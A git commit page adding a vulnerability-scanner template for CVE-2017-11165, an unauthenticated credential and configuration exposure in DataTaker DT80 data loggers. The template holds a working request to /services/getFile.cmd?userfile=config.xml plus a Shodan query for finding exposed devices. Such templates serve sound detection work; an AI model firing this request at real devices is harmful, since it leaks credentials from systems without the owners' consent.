Create CVE-2017-11165.yaml

patch-1
Abhinav Gaur 2023-01-15 18:11:22 +05:30 committed by GitHub
parent c534469294
commit a0479cb879
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 35 additions and 0 deletions

View File

@ -0,0 +1,35 @@
id: CVE-2017-11165
info:
name: DataTaker DT80 dEX 1.50.012 - Sensitive Configurations Exposure
author: theabhinavgaur
severity: critical
description: |
dataTaker DT80 dEX 1.50.012 allows remote attackers to obtain sensitive credential and configuration information via a direct request for the /services/getFile.cmd?userfile=config.xml URI.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2017-11165
- https://www.exploit-db.com/exploits/45094
metadata:
shodan-query:
- http.title:"datataker"
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cwe-id: CWE-200
tags: cve,cve2017,DataTaker,config,exposure,lfr
requests:
- method: GET
path:
- '{{BaseURL}}/services/getFile.cmd?userfile=config.xml'
matchers-condition: and
matchers:
- type: word
words:
- <loggerSettings>
condition: and
- type: status
status:
- 200